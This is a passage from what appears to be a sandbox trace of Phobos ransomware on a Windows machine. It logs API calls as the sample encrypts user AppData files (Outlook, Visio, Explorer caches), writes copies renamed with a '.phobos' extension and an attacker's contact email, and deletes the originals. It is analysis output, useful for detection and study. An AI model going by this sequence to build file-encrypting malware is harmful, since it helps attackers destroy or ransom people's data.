halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.376] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0166.376] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0166.376] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x23f4, lpOverlapped=0x0) returned 1 [0166.425] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2400, dwBufLen=0x2400 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2400) returned 1 [0166.425] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2400, lpOverlapped=0x0) returned 1 [0166.495] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ba8) returned 1 [0166.495] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0166.495] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0166.495] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.495] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0166.496] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.496] CloseHandle (hObject=0x134) returned 1 [0166.496] CloseHandle (hObject=0x158) returned 1 [0166.496] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat")) returned 1 [0166.497] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0166.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.498] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=260) returned 1 [0166.498] CloseHandle (hObject=0x158) returned 1 [0166.498] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat")) returned 0x2020 [0166.498] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.498] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0166.498] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0166.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0166.592] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0166.592] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0166.592] ReadFile (in: hFile=0x158, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x104, lpOverlapped=0x0) returned 1 [0166.593] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0166.593] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0166.593] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ba8) returned 1 [0166.593] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0166.593] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0, dwBufLen=0xa0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa0) returned 1 [0166.593] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.593] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x152, lpOverlapped=0x0) returned 1 [0166.594] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.594] CloseHandle (hObject=0x158) returned 1 [0166.594] CloseHandle (hObject=0x190) returned 1 [0166.594] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat")) returned 1 [0166.595] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0166.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0166.595] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=101600) returned 1 [0166.595] CloseHandle (hObject=0x190) returned 1 [0166.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat")) returned 0x2020 [0166.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0166.595] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0166.596] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0166.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.596] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0166.596] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0166.596] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x18ce0, lpOverlapped=0x0) returned 1 [0166.783] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x18cf0, dwBufLen=0x18cf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x18cf0) returned 1 [0166.784] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x18cf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x18cf0, lpOverlapped=0x0) returned 1 [0166.786] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0166.786] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0166.786] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0166.786] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0166.786] WriteFile (in: hFile=0x158, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0166.786] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.786] CloseHandle (hObject=0x190) returned 1 [0166.786] CloseHandle (hObject=0x158) returned 1 [0167.354] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat")) returned 1 [0167.356] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0167.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\1033\\StructuredQuerySchema.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\1033\\structuredqueryschema.bin"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0167.637] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=299160) returned 1 [0167.637] CloseHandle (hObject=0x190) returned 1 [0167.637] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\1033\\StructuredQuerySchema.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\1033\\structuredqueryschema.bin")) returned 0x2020 [0167.637] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\1033\\StructuredQuerySchema.bin.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\1033\\structuredqueryschema.bin.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\1033\\StructuredQuerySchema.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\1033\\structuredqueryschema.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0167.637] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0167.637] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0167.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\1033\\StructuredQuerySchema.bin.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\1033\\structuredqueryschema.bin.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0167.638] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0167.638] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0167.638] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x49098, lpOverlapped=0x0) returned 1 [0167.941] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x490a0, dwBufLen=0x490a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x490a0) returned 1 [0167.944] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x490a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x490a0, lpOverlapped=0x0) returned 1 [0167.951] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0167.951] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0167.952] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0167.952] CryptDestroyKey (hKey=0xa32d28) returned 1 [0167.952] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0167.952] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0167.952] CloseHandle (hObject=0x190) returned 1 [0167.952] CloseHandle (hObject=0x180) returned 1 [0167.952] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\1033\\StructuredQuerySchema.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\1033\\structuredqueryschema.bin")) returned 1 [0167.955] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0167.955] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0167.956] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=24) returned 1 [0167.956] CloseHandle (hObject=0x180) returned 1 [0167.956] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db")) returned 0x2020 [0167.956] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.956] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0167.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0167.957] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1048576) returned 1 [0167.957] CloseHandle (hObject=0x180) returned 1 [0167.957] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db")) returned 0x2020 [0167.957] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.957] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0167.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0167.958] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=24) returned 1 [0167.958] CloseHandle (hObject=0x180) returned 1 [0167.958] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db")) returned 0x2020 [0167.958] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.958] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0167.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0167.958] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1048576) returned 1 [0167.958] CloseHandle (hObject=0x180) returned 1 [0167.958] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db")) returned 0x2020 [0167.959] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0167.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.959] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0167.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: 